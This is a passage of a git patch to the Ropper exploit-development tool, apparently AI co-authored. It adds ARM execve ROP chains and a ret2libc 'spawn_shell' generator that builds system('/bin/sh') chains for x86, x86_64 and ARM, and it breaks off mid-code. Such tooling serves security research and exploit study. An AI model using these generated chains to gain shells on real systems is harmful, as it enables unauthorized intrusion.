From a602167c587aebb5303834f30c31dbe344f84d76 Mon Sep 17 00:00:00 2001 From: Robbie Date: Wed, 3 Jun 2026 07:29:25 +0300 Subject: [PATCH] Add ARM execve chain support and a ret2libc spawn_shell generator ARM --chain execve: ArchitectureArm previously raised "does not have support for execve chain generation". This adds ARM gadget categories (pop/ldm pop-pc LOAD_REG, WRITE_MEM, LOAD_MEM, SYSCALL) and the svc 0 SYS ending, plus a generator that discovers terminal pop-pc / ldm dispatch gadgets, fills r0/r1/r2/r7 with a re-loading-aware register cover planner, writes the command into .data, and emits clearly-labelled placeholders when a gadget (svc 0, an r0 pop, ...) is missing. New --chain spawn_shell for x86, x86_64 and ARM: a ret2libc system("/bin/sh") generator emitting the correct per-arch calling convention -- x86 cdecl (stack arg), x86_64 System V (rdi + a movaps stack-alignment ret), ARM AAPCS (r0 + pc dispatch). Options: cmd (default /bin/sh, any path), address (libc system), string (&cmd), align (x86_64). system() resolution: address= > a system symbol defined in the binary (rebased) > verified system@plt > import hint > placeholder. _findPltStub disassembles .plt/.plt.sec/.plt.got and returns the stub whose indirect jump provably dereferences system's GOT slot (x86_64 jmp [rip+disp], x86 jmp [abs], ARM add ip,pc,#imm[,#rot] ; ... ; ldr pc,[ip,#imm]!), verified against the relocation, so it never emits a silently-wrong address; x86 PIE jmp [ebx+off] and stripped PLTs fall back to the hint. "/bin/sh" resolution: string= > an existing copy already in the binary (no write) > write the string into a writable scratch section, .bss preferred, via write-what-where gadgets > placeholder. _findWritableSection reads ELF section headers directly (SHF_WRITE|SHF_ALLOC, not TLS, sh_size >= needed) so writability and free space are verified natively; it avoids getSection('.bss') because .bss is SHT_NOBITS (raw is None, size comes from sh_size). Correctness fixes: - The scratch-buffer pointer was double-imageBase-subtracted (pointer != written bytes); it now uses the same rebase_N(offset) convention as the write. - x86_64 _paddingNeededFor's ^pop (...)$ regex dropped pop r8/pop r9 (2-char regs), under-padding chains; broadened to \w{2,3} (also hardens execve/mprotect). - _useBinaryForRebase registers the binary with the gadgets' own (fileName, section) identity, so a later gadget registration reuses the entry instead of emitting a duplicate IMAGE_BASE. - The written string is always NUL-terminated: the shared _nulTerminateAndPad appends the NUL unconditionally before word-aligning (ARM previously skipped it for cmd lengths that were a multiple of 4). Help text (--help epilog in options.py, README.md, interactive ropchain help in console.py) lists spawn_shell, the .bss write and cmd=, and marks execve as ARM-capable. Tests: testcases/test_chain_arm.py and testcases/test_chain_spawn_shell.py; full suite 58/58. Co-Authored-By: Claude Opus 4.8 (1M context) --- README.md | 3 +- ropper/arch.py | 25 +- ropper/console.py | 4 +- ropper/options.py | 3 +- ropper/ropchain/arch/__init__.py | 1 + ropper/ropchain/arch/ropchainarm.py | 569 +++++++++++++++++++++++++ ropper/ropchain/arch/ropchainx86.py | 81 +++- ropper/ropchain/arch/ropchainx86_64.py | 87 +++- ropper/ropchain/ropchain.py | 388 +++++++++++++++++ testcases/test_chain_arm.py | 56 +++ testcases/test_chain_spawn_shell.py | 342 +++++++++++++++ 11 files changed, 1552 insertions(+), 7 deletions(-) create mode 100644 ropper/ropchain/arch/ropchainarm.py create mode 100644 testcases/test_chain_arm.py create mode 100644 testcases/test_chain_spawn_shell.py diff --git a/README.md b/README.md index b8c4db5..000a29a 100644 --- a/README.md +++ b/README.md @@ -117,7 +117,8 @@ Usage SPARC [SPARC64] available rop chain generators: - execve (execve[=], default /bin/sh) [Linux x86, x86_64] + execve (execve[=], default /bin/sh) [Linux x86, x86_64, ARM] + spawn_shell (spawn_shell[ cmd=][ address=]), ret2libc system, writes cmd to .bss if absent [Linux x86, x86_64, ARM] mprotect (mprotect=
:) [Linux x86, x86_64] virtualprotect (virtualprotect=
:) [Windows x86] diff --git a/ropper/arch.py b/ropper/arch.py index 70a7b4f..275e3eb 100644 --- a/ropper/arch.py +++ b/ropper/arch.py @@ -389,11 +389,33 @@ def _initGadgets(self): super(ArchitectureArm, self)._initGadgets() self._endings[gadget.GadgetType.ROP] = [(b"[\x00-\xff][\x80-\xff][\x10-\x1e\x30-\x3e\x50-\x5e\x70-\x7e\x90-\x9e\xb0-\xbe\xd0-\xde\xf0-\xfe][\xe8\xe9]", 4), # pop {[reg]*,pc}, ldm [reg], {*,pc} (b"\x04\xf0\x9d\xe4", 4) # pop {pc} - ] + ] self._endings[gadget.GadgetType.JOP] = [(b'[\x10-\x1e]\xff\x2f\xe1', 4), # bx (b'[\x30-\x3e]\xff\x2f\xe1', 4), # blx (b'[\x00-\x0f]\xf0\xa0\xe1', 4), # mov pc, (b'\x00\x80\xbd\xe8', 4)] # ldm sp! ,{pc} + self._endings[gadget.GadgetType.SYS] = [(b'\x00\x00\x00\xef', 4)] # svc 0 + + def _initCategories(self): + # Minimal categories needed for the execve ropchain generator. + # LOAD_REG matches only single-instruction multi-register pops that + # write pc (the gadget's own dispatch). `dst` captures the entire + # register list as text; the chain generator parses it. + self._categories = { + gadget.Category.LOAD_REG : ( + (r'^pop \{(?P[^}]*\bpc)\}$', + r'^ldm(?:ia|fd)? sp!, \{(?P[^}]*\bpc)\}$'), + ('push','bl','blx','b ','bx','svc','str')), + gadget.Category.WRITE_MEM : ( + (r'^str (?P\w{2,4}), \[(?P\w{2,4})\]$',), + ('push','bl','blx','b ','bx','svc')), + gadget.Category.LOAD_MEM : ( + (r'^ldr (?P\w{2,4}), \[(?P\w{2,4})\]$',), + ('push','bl','blx','b ','bx','svc','str')), + gadget.Category.SYSCALL : ( + (r'^svc #?0(?:x0+)?$',), + ('push','bl','blx','b ','bx')), + } class ArchitectureArmBE(ArchitectureArm): @@ -414,6 +436,7 @@ def _initEndianess(self, endianess): (b'\xe1\x2f\xff[\x30-\x3e]', 4), # blx (b'\xe1\xa0\xf0[\x00-\x0f]', 4), # mov pc, (b'\xe8\xdb\x80\x01', 4)] # ldm sp! ,{pc} + self._endings[gadget.GadgetType.SYS] = [(b'\xef\x00\x00\x00', 4)] # svc 0 class ArchitectureArmThumb(Architecture): diff --git a/ropper/console.py b/ropper/console.py index 1f75e78..ba943e5 100644 --- a/ropper/console.py +++ b/ropper/console.py @@ -450,6 +450,8 @@ def __printExamples(self): {0} --file /bin/ls --type jop {0} --file /bin/ls --chain execve {0} --file /bin/ls --chain "execve cmd=/bin/sh" --badbytes 000a0d + {0} --file /bin/ls --chain spawn_shell + {0} --file /bin/ls --chain "spawn_shell address=0xf7c4d3e0" {0} --file /bin/ls --chain "mprotect address=0xbfdff000 size=0x21000" {0} --file /bin/ls /lib/libc.so.6 --console @@ -932,7 +934,7 @@ def do_ropchain(self, text): def help_ropchain(self): self.__printHelpText('ropchain [ argname=arg[ argname=arg...]]', - 'uses the given generator and create a ropchain with args\n\nAvailable generators:\nexecve\nargs: cmd (optional)\navailable: x86, x86_64\nOS: linux\n\nmprotect\nargs: address, size\navailable: x86, x86_64\nOS: linux\n\nvirtualprotect\nargs: address (IAT)(optional)\navailable: x86\nOS: Windows\n\nExamples:\nropchain execve\nropchain mprotect address=0xbfff0000 size=0x21000') + 'uses the given generator and create a ropchain with args\n\nAvailable generators:\nexecve\nargs: cmd (optional), address (optional)\navailable: x86, x86_64, ARM\nOS: linux\n\nspawn_shell\ncalls libc system(cmd), default cmd /bin/sh (ret2libc); writes cmd into .bss when it is not already present in the binary\nargs: cmd (optional path), address (libc system, optional), string (&cmd, optional)\navailable: x86, x86_64, ARM\nOS: linux\n\nmprotect\nargs: address, size\navailable: x86, x86_64\nOS: linux\n\nvirtualprotect\nargs: address (IAT)(optional)\navailable: x86\nOS: Windows\n\nExamples:\nropchain execve\nropchain spawn_shell\nropchain spawn_shell address=0xf7c4d3e0\nropchain mprotect address=0xbfff0000 size=0x21000') def do_quit(self, text): exit(0) diff --git a/ropper/options.py b/ropper/options.py index 95ce36b..d51ec0e 100644 --- a/ropper/options.py +++ b/ropper/options.py @@ -69,7 +69,8 @@ def _createArgParser(self): SPARC [SPARC64] available rop chain generators: - execve (execve[=], default /bin/sh) [Linux x86, x86_64] + execve (execve[=], default /bin/sh) [Linux x86, x86_64, ARM] + spawn_shell (spawn_shell[ cmd=][ address=]), ret2libc system, writes cmd to .bss if absent [Linux x86, x86_64, ARM] mprotect (mprotect address=0xdeadbeef size=0x10000) [Linux x86, x86_64] virtualprotect (virtualprotect address=0xdeadbeef) [Windows x86] """) diff --git a/ropper/ropchain/arch/__init__.py b/ropper/ropchain/arch/__init__.py index 2d01abe..50d244e 100644 --- a/ropper/ropchain/arch/__init__.py +++ b/ropper/ropchain/arch/__init__.py @@ -27,3 +27,4 @@ # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from ropper.ropchain.arch.ropchainx86 import * from ropper.ropchain.arch.ropchainx86_64 import * +from ropper.ropchain.arch.ropchainarm import * diff --git a/ropper/ropchain/arch/ropchainarm.py b/ropper/ropchain/arch/ropchainarm.py new file mode 100644 index 0000000..10d8c6f --- /dev/null +++ b/ropper/ropchain/arch/ropchainarm.py @@ -0,0 +1,569 @@ +# coding=utf-8 +# Copyright 2018 Sascha Schirra +# +# Redistribution and use in source and binary forms, with or without +# modification, are permitted provided that the following conditions are met: +# +# 1. Redistributions of source code must retain the above copyright notice, this +# list of conditions and the following disclaimer. +# +# 2. Redistributions in binary form must reproduce the above copyright notice, +# this list of conditions and the following disclaimer in the documentation +# and/or other materials provided with the distribution. +# +# 3. Neither the name of the copyright holder nor the names of its contributors +# may be used to endorse or promote products derived from this software without +# specific prior written permission. +# +# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND +# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED +# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE +# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE +# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL +# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER +# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, +# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE +# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. +from ropper.gadget import Category, Gadget +from ropper.common.error import * +from ropper.common.utils import * +from ropper.rop import Ropper +from ropper.arch import ARM +from ropper.ropchain.ropchain import * +from ropper.loaders.loader import Type +from ropper.loaders.elf import ELF +from ropper.loaders.raw import Raw +import re +import sys + +if sys.version_info.major == 2: + range = xrange + + +_ARM_ALIASES = {'sb': 9, 'sl': 10, 'fp': 11, 'ip': 12, 'sp': 13, 'lr': 14, 'pc': 15} + +# Matches a single-instruction pop-pc terminator. The `dst` group captures +# the complete brace-delimited register list as text; the chain generator +# parses it into a sorted list of register names. +_POP_LAST_LINE_RE = re.compile(r'^(?:pop|ldm(?:ia|fd)? sp!,)\s*\{([^}]*\bpc)\}$') + +# Mnemonics whose first arg is read (not written). Used to exclude false +# positives from the conservative "register clobber" analysis. +_READS_FIRST_ARG = frozenset(( + 'str', 'strb', 'strh', 'strd', 'strex', 'strexb', 'strexh', + 'stm', 'stmia', 'stmib', 'stmda', 'stmdb', 'stmfd', 'stmea', 'push', + 'cmp', 'cmn', 'tst', 'teq', + 'b', 'bl', 'blx', 'bx', 'svc', 'swi', + 'msr', 'nop', 'dmb', 'dsb', 'isb', +)) + +_FIRST_REG_RE = re.compile( + r'^[a-z]+\s+\{?(r1[0-5]|r\d|sb|sl|fp|ip|sp|lr|pc)\b') + +# Whitelist of mnemonics safe to appear before a gadget's terminal pop-pc. +# We exclude all forms of store (memory writes that could trash the chain +# itself), all branches, all svc/swi, all coprocessor ops, all conditionals, +# and anything that writes to sp/pc. Everything in this set is unconditional +# and either pure-register or pure-load. +_SAFE_NONTERMINAL_MNEMS = frozenset(( + 'mov', 'mvn', 'movs', 'mvns', 'mrs', + 'add', 'sub', 'rsb', 'adc', 'sbc', 'rsc', + 'adds', 'subs', 'rsbs', 'adcs', 'sbcs', 'rscs', + 'and', 'orr', 'eor', 'bic', + 'ands', 'orrs', 'eors', 'bics', + 'lsl', 'lsr', 'asr', 'ror', 'rrx', + 'lsls', 'lsrs', 'asrs', 'rors', 'rrxs', + 'mul', 'mla', 'mls', 'muls', 'mlas', + 'umull', 'smull', 'umlal', 'smlal', + 'cmp', 'cmn', 'tst', 'teq', + 'sxtb', 'sxth', 'uxtb', 'uxth', 'sxtab', 'sxtah', 'uxtab', 'uxtah', + 'rev', 'rev16', 'revsh', 'rbit', 'clz', + 'nop', + 'ldr', 'ldrb', 'ldrh', +)) + + +def _isUsableChainGadget(gadget): + """Return True if `gadget` is safe to chain. A usable gadget: + * ends in a clean pop-pc (terminator pop set must not include sp) + * every non-terminal instruction's mnemonic is in the small safe-list + (no memory writes, no branches, no svc, no conditionals, no sp/pc writes) + """ + if not _popPcMatch(gadget): + return False + if 'sp' in _popPcRegs(gadget): + return False # mid-chain stack pivot + for line in gadget.lines[:-1]: + text, mnem = line[1], line[2] + if mnem not in _SAFE_NONTERMINAL_MNEMS: + return False + m = _FIRST_REG_RE.match(text) + if m and m.group(1) in ('sp', 'pc'): + return False + return True + + +def _reg_index(reg): + """Canonical numeric index for an ARM register name. + + ARM's pop/ldm always loads registers in ascending numeric order regardless of + how they're written in the assembly source, so this index is also the stack + slot the register receives its value from. + """ + if reg in _ARM_ALIASES: + return _ARM_ALIASES[reg] + if reg.startswith('r') and reg[1:].isdigit(): + return int(reg[1:]) + return -1 + + +def _popPcMatch(gadget): + if not gadget.lines: + return None + return _POP_LAST_LINE_RE.match(gadget.lines[-1][1]) + + +def _popPcRegs(gadget): + """Registers loaded by the gadget's terminal pop-pc, in stack-slot order.""" + m = _popPcMatch(gadget) + if not m: + return [] + regs = [r.strip() for r in m.group(1).split(',')] + return sorted(regs, key=_reg_index) + + +def _clobberedRegs(gadget): + """Conservative set of registers the gadget destroys. Includes the + terminal pop set plus any register that appears as the first (written) + operand of an earlier instruction.""" + regs = _bodyClobberedRegs(gadget) + regs.update(_popPcRegs(gadget)) + regs.discard('pc') + return regs + + +def _bodyClobberedRegs(gadget): + """Registers destroyed by gadget *body* instructions (not the terminal pop). + These clobbers are unrecoverable — the body writes whatever value its + semantics dictate, so we cannot supply the new value from the chain. + A reg in this set, if already loaded with a target value, is lost.""" + regs = set() + for line in gadget.lines[:-1]: + text, mnem = line[1], line[2] + if mnem in _READS_FIRST_ARG: + continue + m = _FIRST_REG_RE.match(text) + if m: + regs.add(m.group(1)) + return regs + + +class RopChainARM(RopChain): + """Base class for ARM (32-bit, EABI) ROP-chain generators.""" + + MAX_QUALI = 7 + + @classmethod + def name(cls): + return '' + + @classmethod + def availableGenerators(cls): + return [RopChainARMExecve, RopChainARMSpawnShell] + + @classmethod + def archs(cls): + return [ARM] + + def _packFmt(self): + return "' len(best_cov): + best, best_cov = g, cov + if not best: + missing = ', '.join(sorted(remaining)) + self._printMessage( + 'Cannot find pop gadget for: %s - emitting placeholder.' % missing) + text += '# TODO: load %s manually - no pop gadget found that\n' % missing + text += '# covers them without body-clobbering loaded targets: %s\n' % ( + ', '.join(sorted(loaded)) or '(none)') + break + self._updateUsedBinaries(best) + # values_for() already re-supplies every popped reg that is in + # `targets`, so previously-loaded targets keep their values. + text += self._printPopGadget(best, values_for(_popPcRegs(best))) + remaining -= best_cov + return text + + def create(self, options=None): + options = options or {} + cmd = options.get('cmd') or '/bin/sh' + address = options.get('address') + + if len(cmd.split(' ')) > 1: + raise RopChainError('No argument support for execve commands') + + self._printMessage('ROPchain Generator for syscall execve on ARM (Linux EABI):') + self._printMessage('\nload registers:') + self._printMessage(' r0 = pointer to cmd string') + self._printMessage(' r1 = 0 (argv = NULL)') + self._printMessage(' r2 = 0 (envp = NULL)') + self._printMessage(' r7 = 11 (NR_execve)') + self._printMessage('then: svc 0') + + chain_body = '\n' + cmd_address_str = None + + if address is None: + # Try to write `cmd` into .data and use that address for r0. + try: + section = self._binaries[0].getSection('.data') + cmdaddress = section.offset + write_text = self._writeCommandToDataSection(cmd, cmdaddress) + chain_body += write_text + # The write path will have added the str gadget's binary to + # _usedBinaries. Its rebase idx is what we need to address + # the freshly-written cmd buffer. + for i, (fname, _sec) in enumerate(self._usedBinaries): + if fname == self._binaries[0].fileName: + cmd_address_str = self._printRebasedAddress(toHex(cmdaddress, 4), idx=i) + break + cmd_addr_value = cmdaddress + except RopChainError as e: + self._printMessage('Cannot synthesize cmd-write gadget: %s' % e) + self._printMessage('Using 0x41414141 as cmd address - please replace.') + cmd_addr_value = 0x41414141 + else: + cmd_addr_value = int(address, 16) if isinstance(address, str) else address + + targets = {'r0': cmd_addr_value, 'r1': 0, 'r2': 0, 'r7': 11} + chain_body += self._loadRegisters(targets, cmd_address_str=cmd_address_str) + + # svc 0 terminator. + svc = self._findSvc0() + if svc is not None: + idx = self._binaryIdx(svc) + chain_body += 'rop += rebase_%d(%s) # %s\n' % ( + idx, toHex(svc.lines[0][0], 4), svc.simpleString()) + else: + chain_body += '# INSERT SVC 0 GADGET HERE\n' + self._printMessage('No svc 0 gadget found!') + + chain = self._printHeader() + chain += self._printRebase() + chain += "rop = ''\n" + chain += chain_body + chain += 'print(rop)\n' + return chain + + +class RopChainARMSpawnShell(RopChainARM): + """Generate a ret2libc ``system('/bin/sh')`` chain for ARM (AAPCS). + + The first argument is passed in ``r0``; control reaches ``system()`` via + the ``pc`` slot of a terminal-pop dispatch gadget:: + + [ pop {r0, .., pc} ] (placeholder if no r0-popping gadget exists) + [ &"/bin/sh" ] -> r0 + [ padding... ] -> any GP regs popped between r0 and pc + [ &system ] -> loaded into pc => branches to system() + + ``&system`` and ``&"/bin/sh"`` are resolved by the shared base helpers + (supplied address > in-binary symbol/write > placeholder).""" + + @classmethod + def usableTypes(cls): + return (ELF, Raw) + + @classmethod + def name(cls): + return 'spawn_shell' + + def create(self, options=None): + options = options or {} + cmd = options.get('cmd') or '/bin/sh' + address = options.get('address') + string = options.get('string') + + self._printMessage('ROPchain Generator for system() on ARM (ret2libc):') + self._printMessage(' r0 = pointer to cmd string, then branch to system()') + + defs = '' + body = '\n' + + binsh_line, binsh_defs, write_text = self._resolveBinshPointer(cmd, string) + defs += binsh_defs + body += write_text + + system_line, system_defs = self._resolveSystemAddress(address) + defs += system_defs + + # pop {r0, .., pc}: r0 <- &"/bin/sh", pc <- system() + pop = self._findPopGadget(['r0']) + if pop is not None: + body += self._printPopGadget(pop, {'r0': binsh_line}) + # The stack slot consumed by pc (after every popped GP register) + # is whatever we emit next, so system() lands in pc. + body += system_line + else: + self._printMessage('No `pop {r0, .., pc}` gadget found; emitting placeholder.') + body += '# INSERT `pop {r0, pc}` GADGET HERE\n' + body += binsh_line + '# ^ value intended for r0\n' + body += system_line + '# ^ value intended for pc (system)\n' + + chain = self._printHeader() + chain += self._printRebase() + chain += defs + chain += "rop = ''\n" + chain += body + chain += 'print(rop)\n' + return chain diff --git a/ropper/ropchain/arch/ropchainx86.py b/ropper/ropchain/arch/ropchainx86.py index 132a3a8..ac64a2e 100644 --- a/ropper/ropchain/arch/ropchainx86.py +++ b/ropper/ropchain/arch/ropchainx86.py @@ -76,7 +76,7 @@ def name(cls): @classmethod def availableGenerators(cls): - return [RopChainX86System, RopChainX86Mprotect, RopChainX86VirtualProtect] + return [RopChainX86System, RopChainX86SpawnShell, RopChainX86Mprotect, RopChainX86VirtualProtect] @classmethod def archs(self): @@ -630,6 +630,14 @@ def _searchOpcode(self, opcode): else: raise RopChainError('Cannot create gadget for opcode: %s' % opcode) + def _addressWidth(self): + return 4 + + def _writeCmdToMemory(self, cmd, where): + # NUL-terminate + word-align so the writewhatwhere gadget emits whole + # words and the buffer is a valid C string. + return self._createWriteStringWhere(self._nulTerminateAndPad(cmd), where)[0] + def create(self): pass @@ -746,6 +754,77 @@ def create(self, options={}): return chain +class RopChainX86SpawnShell(RopChainX86): + """Generate a ret2libc ``system('/bin/sh')`` chain for x86 (cdecl). + + cdecl passes arguments on the stack, so the call itself needs no + register-loading gadget; the chain is three words:: + + [ &system ] <- overwritten return address; system() runs + [ ret_after ] <- where system() returns (exit() / `ret` gadget / junk) + [ &"/bin/sh" ] <- system()'s first argument + + ``&system`` and ``&"/bin/sh"`` are resolved by the shared helpers in the + base class (supplied address > in-binary symbol/write > placeholder).""" + + @classmethod + def usableTypes(self): + return (ELF, Raw) + + @classmethod + def name(cls): + return 'spawn_shell' + + def _resolveReturnAddress(self): + """The address system() returns to. A resolvable exit() is cleanest; a + bare `ret` keeps the stack tidy; otherwise junk (the shell has already + spawned, so it rarely matters).""" + sym = self._findSymbolAddress('exit') + if sym is not None: + return self._rebaseLine(sym, 'return address: exit()') + try: + ret = self._searchOpcode('c3') + if ret: + idx = self._usedBinaries.index((ret.fileName, ret.section)) + return 'rop += rebase_%d(%s) # return address: ret\n' % (idx, toHex(ret.lines[0][0], 4)) + except RopChainError: + pass + return 'rop += p(0xdeadbeef) # return address (placeholder)\n' + + def create(self, options=None): + options = options or {} + cmd = options.get('cmd') or '/bin/sh' + address = options.get('address') # absolute libc system() + string = options.get('string') # absolute &"/bin/sh" + + self._printMessage('ROPchain Generator for system() on x86 (ret2libc):') + self._printMessage(' layout: [&system][ret][&cmd] (cdecl, arg on stack)') + + defs = '' + body = '\n' + + # Resolve the "/bin/sh" pointer first (it may inject a .data write that + # must run before the call). + binsh_line, binsh_defs, write_text = self._resolveBinshPointer(cmd, string) + defs += binsh_defs + body += write_text + + system_line, system_defs = self._resolveSystemAddress(address) + defs += system_defs + + body += system_line + body += self._resolveReturnAddress() + body += binsh_line + + chain = self._printHeader() + chain += self._printRebase() + chain += defs + chain += "rop = ''\n" + chain += body + chain += 'print(rop)\n' + return chain + + class RopChainX86Mprotect(RopChainX86): """ Builds a ropchain for mprotect syscall diff --git a/ropper/ropchain/arch/ropchainx86_64.py b/ropper/ropchain/arch/ropchainx86_64.py index b6bd172..ef6ea72 100644 --- a/ropper/ropchain/arch/ropchainx86_64.py +++ b/ropper/ropchain/arch/ropchainx86_64.py @@ -76,7 +76,7 @@ def name(cls): @classmethod def availableGenerators(cls): - return [RopChainSystemX86_64, RopChainMprotectX86_64] + return [RopChainSystemX86_64, RopChainSpawnShellX86_64, RopChainMprotectX86_64] @classmethod def archs(self): @@ -166,7 +166,10 @@ def _paddingNeededFor(self, gadget): regs = [] for idx in range(1,len(gadget.lines)): line = gadget.lines[idx][1] - matched = match('^pop (...)$', line) + # 2-3 register chars so the extended regs r8/r9 are counted too + # (the old `(...)` matched exactly 3 chars and silently dropped + # `pop r8` / `pop r9`, under-padding the chain). + matched = match(r'^pop (\w{2,3})$', line) if matched: regs.append(matched.group(1)) return regs @@ -624,6 +627,14 @@ def _searchOpcode(self, opcode): else: raise RopChainError('Cannot create gadget for opcode: %s' % opcode) + def _addressWidth(self): + return 8 + + def _writeCmdToMemory(self, cmd, where): + # NUL-terminate + quad-word-align so the writewhatwhere gadget emits + # whole quad-words and the buffer is a valid C string. + return self._createWriteStringWhere(self._nulTerminateAndPad(cmd), where)[0] + def create(self): pass @@ -735,6 +746,78 @@ def create(self, options): return chain +class RopChainSpawnShellX86_64(RopChainX86_64): + """Generate a ret2libc ``system('/bin/sh')`` chain for x86_64 (System V). + + The first integer argument goes in ``rdi``:: + + [ pop rdi ; ret ] (loads &"/bin/sh"; placeholder if absent) + [ &"/bin/sh" ] + [ ret ] <- 16-byte stack-alignment ret for glibc movaps + [ &system ] + + Modern glibc ``system()`` executes ``movaps`` against a 16-byte aligned + stack; the extra bare ``ret`` realigns it. Pass ``align=false`` to omit.""" + + @classmethod + def usableTypes(self): + return (ELF, Raw) + + @classmethod + def name(cls): + return 'spawn_shell' + + def create(self, options=None): + options = options or {} + cmd = options.get('cmd') or '/bin/sh' + address = options.get('address') + string = options.get('string') + align_opt = options.get('align') + align = True + if align_opt is not None: + align = str(align_opt).lower() not in ('0', 'false', 'no', 'off') + + self._printMessage('ROPchain Generator for system() on x86_64 (ret2libc):') + self._printMessage(' rdi = &"/bin/sh", then call system()') + + defs = '' + body = '\n' + + binsh_line, binsh_defs, write_text = self._resolveBinshPointer(cmd, string) + defs += binsh_defs + body += write_text + + # pop rdi ; ret -> rdi = &"/bin/sh" + pop_rdi = self._find(Category.LOAD_REG, reg='rdi') + if pop_rdi is not None: + body += self._printRopInstruction(pop_rdi, padding=True, value=binsh_line) + else: + self._printMessage('No `pop rdi ; ret` gadget found; emitting placeholder.') + body += '# INSERT `pop rdi ; ret` GADGET HERE\n' + body += binsh_line + + # Optional 16-byte stack alignment ret (glibc system() uses movaps). + if align: + try: + body += '# 16-byte stack alignment for glibc system() (movaps):\n' + body += self._createOpcode('c3') + except RopChainError: + self._printMessage('No `ret` gadget for stack alignment; skipping.') + body += '# (no `ret` gadget found for alignment)\n' + + system_line, system_defs = self._resolveSystemAddress(address) + defs += system_defs + body += system_line + + chain = self._printHeader() + chain += self._printRebase() + chain += defs + chain += "rop = ''\n" + chain += body + chain += 'print(rop)\n' + return chain + + class RopChainMprotectX86_64(RopChainX86_64): """ Builds a ropchain for mprotect syscall diff --git a/ropper/ropchain/ropchain.py b/ropper/ropchain/ropchain.py index d4caa8f..d3a52df 100644 --- a/ropper/ropchain/ropchain.py +++ b/ropper/ropchain/ropchain.py @@ -27,6 +27,7 @@ # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from ropper.common.abstract import * from ropper.common.error import * +from ropper.common.utils import * class RopChain(Abstract): @@ -110,3 +111,390 @@ def containsBadbytes(self, value, bytecount=4): def _printMessage(self, message): if self.__callback: self.__callback(message) + + # ------------------------------------------------------------------ + # Shared symbol / string resolution helpers. + # + # These are best-effort and defensive: they only work for ELF binaries + # whose inner filebytes object exposes sections/symbols/relocations, and + # they degrade to ``None`` for every other file type rather than raising. + # ret2libc generators (spawn_shell) use them to auto-resolve the address + # of ``system`` and a ``"/bin/sh"`` pointer where the binary makes that + # possible, falling back to clearly-labelled placeholders otherwise. + # ------------------------------------------------------------------ + def _findSymbolAddress(self, name): + """Return the virtual address of a *defined* symbol ``name`` from the + primary binary's ``.symtab``/``.dynsym``, or ``None``. + + Only symbols that are actually defined inside this file are returned + (``st_value`` set and ``st_shndx`` not ``SHN_UNDEF``); imported + (undefined) symbols are reported via :meth:`_findImportGotSlot` + instead. This resolves e.g. libc ``system`` for statically linked or + non-stripped binaries.""" + binary = self._binaries[0] + inner = getattr(binary, '_binary', None) + sections = getattr(inner, 'sections', None) + if not sections: + return None + try: + for section in sections: + if getattr(section, 'name', '') in ('.symtab', '.dynsym'): + for sym in section.symbols: + if sym.name == name and sym.header.st_value and sym.header.st_shndx: + return sym.header.st_value + except BaseException: + return None + return None + + def _findImportGotSlot(self, name): + """Return the GOT slot virtual address for an imported symbol ``name`` + (the ``r_offset`` of its PLT/GOT relocation), or ``None``. + + This does not resolve the runtime address of the function (that lives + in a shared library), but the slot address is a useful hint and proves + the symbol is imported through the PLT.""" + binary = self._binaries[0] + inner = getattr(binary, '_binary', None) + sections = getattr(inner, 'sections', None) + if not sections: + return None + try: + for section in sections: + relocs = getattr(section, 'relocations', None) + if not relocs: + continue + for reloc in relocs: + sym = getattr(reloc, 'symbol', None) + if sym is not None and sym.name == name: + return reloc.header.r_offset + except BaseException: + return None + return None + + def _findPltStub(self, name): + """Return the virtual address of the PLT stub for the imported symbol + ``name`` (i.e. ``name@plt`` -- the address a ret2plt chain jumps to), or + ``None``. + + The stub is found by disassembling the binary's PLT sections and + locating the entry whose indirect jump *provably* dereferences + ``name``'s GOT slot. Because the match is verified against the actual + relocation target, this never returns a silently-wrong address: if the + layout cannot be parsed (stripped PLT, x86 PIE ``jmp [ebx+off]`` whose + GOT base is unknown at rest, unsupported arch) it returns ``None`` and + the caller falls back to a hint + placeholder.""" + got = self._findImportGotSlot(name) + if got is None: + return None + binary = self._binaries[0] + arch = getattr(binary, 'arch', None) + try: + from capstone import Cs, CS_OP_MEM, CS_OP_IMM, CS_ARCH_ARM + md = Cs(arch._arch, arch._mode) + md.detail = True + except BaseException: + return None + + sections = [] + for sname in ('.plt.sec', '.plt', '.plt.got'): + try: + sections.append(binary.getSection(sname)) + except BaseException: + pass + if not sections: + return None + + is_arm = (arch._arch == CS_ARCH_ARM) + for section in sections: + try: + code = bytes(bytearray(section.bytes)) + if is_arm: + stub = self._scanPltArm(md, code, section.virtualAddress, got, CS_OP_MEM, CS_OP_IMM) + else: + stub = self._scanPltX86(md, code, section.virtualAddress, got, CS_OP_MEM) + except BaseException: + stub = None + if stub is not None: + return stub + return None + + def _scanPltX86(self, md, code, base, got, CS_OP_MEM): + """Find an x86/x86_64 PLT entry whose ``jmp [mem]`` targets ``got``. + Returns the entry's virtual address (preferring the ``endbr`` landing + pad of a ``.plt.sec`` entry when present).""" + prev = None + for insn in md.disasm(code, base): + if 'jmp' in insn.mnemonic and insn.operands: + op = insn.operands[0] + if op.type == CS_OP_MEM: + base_name = md.reg_name(op.mem.base) if op.mem.base else None + target = None + if base_name == 'rip': # x86_64 RIP-relative + target = insn.address + insn.size + op.mem.disp + elif base_name is None: # x86 absolute (non-PIE) + target = op.mem.disp & 0xffffffff + # base_name == 'ebx'/'rbx' (PIE) -> GOT base unknown, skip + if target is not None and target == got: + if (prev is not None and prev.mnemonic in ('endbr64', 'endbr32') + and prev.address + prev.size == 